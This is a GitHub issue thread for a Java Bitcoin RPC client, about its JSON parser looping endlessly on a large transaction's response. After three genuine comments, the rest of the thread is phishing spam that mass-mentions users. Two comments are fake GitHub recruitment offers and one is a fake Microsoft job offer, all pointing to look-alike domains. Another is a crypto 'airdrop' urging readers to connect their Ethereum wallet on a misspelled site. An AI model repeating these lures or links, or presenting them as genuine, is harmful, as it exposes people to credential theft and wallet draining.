### ISSUE TITLE
endless loop in Json Parse

### ISSUE THREAD

**Issue by gambol** [Polve/JavaBitcoindRpcClient#38]
Code would go to an endless loop when get a big string. The stack are listed below

>      at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSHash(CrippledJavaScriptParser.java:156)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSExpr(CrippledJavaScriptParser.java:191)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSArray(CrippledJavaScriptParser.java:99)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSExpr(CrippledJavaScriptParser.java:189)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSHash(CrippledJavaScriptParser.java:146)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSExpr(CrippledJavaScriptParser.java:191)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSHash(CrippledJavaScriptParser.java:146)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSExpr(CrippledJavaScriptParser.java:191)
>         at wf.bitcoin.krotjson.CrippledJavaScriptParser.parseJSExpr(CrippledJavaScriptParser.java:256)
>         at wf.bitcoin.krotjson.JSON.parse(JSON.java:129)
>         at wf.bitcoin.javabitcoindrpcclient.BitcoinJSONRPCClient.loadResponse(BitcoinJSONRPCClient.java:187)
>         at wf.bitcoin.javabitcoindrpcclient.BitcoinJSONRPCClient.query(BitcoinJSONRPCClient.java:229)
>         at wf.bitcoin.javabitcoindrpcclient.BitcoinJSONRPCClient.getRawTransaction(BitcoinJSONRPCClient.java:1283)

It would occurs every time when getRawTransaction("b6299d23e836d649a5a5012ebfebd2474b4d100d5334d7608d3c6c01b8204b45")

**Comment by Polve** [comment]
Can you please enable FINE logging to understand what string is being parsed?

**Comment by tdiesler** [comment]
That is indeed a [large transaction](https://www.blockchain.com/btc/tx/b6299d23e836d649a5a5012ebfebd2474b4d100d5334d7608d3c6c01b8204b45). I wonder how often folks deal with Txs > 750 BTC ;-)

**Comment by Polve** [comment]
Not difficult to generate those kind of transactions in testnet or regtest

**Comment by dynomind-dev-s** [comment]
**Subject:** Your Dream Job Awaits: Apply Now to Join GitHub as a Developer!

Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
dongsam, @odanado, @giangdiu, @jkingyens, @dznet, @toshihr, @mtnbarreto, @nyetwurk, @barrasso, @davidhlee, @ahoym, @bitampcom, @interisti, @JunichiSugiura, @nowhideme, @adiadore, @amaury1093, @maltheism, @dmitryn, @jefflau

**Comment by dynomind-dev-s** [comment]
**Subject:** Your Dream Job Awaits: Apply Now to Join GitHub as a Developer!

Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
QuincySx, @nikhil-desai, @andrea-dandrea, @vehicles4real, @Francois-Esquire, @BigMurry, @AndreyBronin, @lzhuor, @samisbakedham, @fstakem, @TenviLi, @tihomirovkirillcom, @severinwullschleger, @kryptish, @0xdevalias, @scmilee, @renlulu, @samer, @7flash, @etale-cohomology

**Comment by Malkhedkar-web** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
shanefontaine, @randomnerd, @zctocm, @rimiti, @hakanatabas, @coreyphillips, @emapeire, @rturk, @pciavald, @uno2022, @erik-iglikov, @j42stin, @null-prophet, @vitali2y, @smk1992, @amaury1093, @james-c, @includeleec, @hackmod, @ifvictr

**Comment by AndreSabbagh** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
hadidon, @lyhv, @mopx, @xiaodong0228, @dada-official, @CleberSilva93, @DanTehrani, @x-Tokenize, @fuxingloh, @CrystallineButterfly, @mateuslopes, @benjamino80, @Mrtenz, @jgreys, @PaulBernier, @Jayser23, @lzhuor, @tonymade8, @aluxian, @Qqwy
